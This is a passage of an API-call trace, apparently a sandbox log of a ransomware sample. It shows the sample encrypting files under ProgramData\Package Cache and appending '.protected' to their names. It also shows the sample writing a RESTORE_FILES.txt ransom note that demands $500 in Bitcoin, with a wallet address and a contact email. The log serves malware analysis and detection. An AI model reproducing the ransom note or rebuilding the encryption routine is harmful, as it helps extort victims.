Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned 113 [0074.010] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0074.010] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0074.011] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*") returned 115 [0074.011] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0074.011] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0074.011] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.011] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.011] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.011] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.011] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\.") returned 115 [0074.011] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.011] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.011] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.011] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.011] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.011] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.011] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.011] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\..") returned 116 [0074.011] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.011] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.011] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.011] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0074.011] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0074.011] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0074.011] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0074.012] lstrcmpiW 
(lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0074.012] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 122 [0074.012] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0074.012] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0074.012] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.012] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.012] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.014] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 122 [0074.014] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0074.014] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 122 [0074.014] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0074.014] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 122 [0074.014] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 
[0074.014] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.042] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.042] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.042] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.042] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.095] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.095] CloseHandle (hObject=0xd8) returned 1 [0074.096] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected") returned 132 [0074.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package 
Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.protected")) returned 1 [0074.097] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.097] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Windows") returned -1 [0074.097] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Program Files") returned 1 [0074.097] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Program Files (x86)") returned 1 [0074.097] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="$Recycle.bin") returned 1 [0074.097] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="System Volume Information") returned 1 [0074.097] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 139 [0074.097] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".protected") returned 0x0 [0074.097] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="RESTORE_FILES.txt") returned 1 [0074.097] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.097] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.097] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package 
cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.097] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 139 [0074.097] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".txt") returned 0x0 [0074.097] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 139 [0074.097] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".rar") returned 0x0 [0074.097] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 139 [0074.097] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".zip") returned 0x0 [0074.098] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.116] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.116] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.117] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.117] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.118] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.118] CloseHandle (hObject=0xd8) returned 1 [0074.179] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected") returned 149 [0074.179] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.protected")) returned 1 [0074.180] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0074.180] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0074.180] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 131 [0074.180] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package 
Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0074.185] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.185] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, 
lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0074.186] lstrlenA (lpString="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") returned 684 [0074.186] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0074.186] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.186] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0074.186] CloseHandle (hObject=0xd4) returned 1 [0074.187] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0074.187] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0074.187] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 110 [0074.187] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0074.188] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.188] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0074.189] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.189] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0074.189] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.189] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0074.189] CloseHandle (hObject=0xb4) returned 1 [0074.189] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0074.189] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0074.190] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RESTORE_FILES.txt") returned 101 [0074.190] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package 
Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0074.192] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.192] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0074.193] lstrlenA (lpString="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") returned 684 [0074.193] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0074.193] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.193] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0074.193] CloseHandle (hObject=0xa4) returned 1 [0074.193] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0074.193] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="Windows") returned -1 [0074.193] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="Program Files") returned -1 [0074.193] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="Program Files (x86)") returned -1 [0074.193] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="$Recycle.bin") returned 1 [0074.193] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="System Volume Information") returned -1 [0074.193] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned 83 [0074.193] lstrcmpW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2=".") returned 1 [0074.193] lstrcmpW 
(lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="..") returned 1 [0074.194] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*") returned 85 [0074.194] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0074.195] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.195] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.195] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.195] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.195] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.195] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\.") returned 85 [0074.195] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.195] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.196] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.196] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.196] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.196] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.196] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.196] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\..") returned 86 [0074.196] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.196] lstrcmpW (lpString1="..", lpString2="..") returned 0 
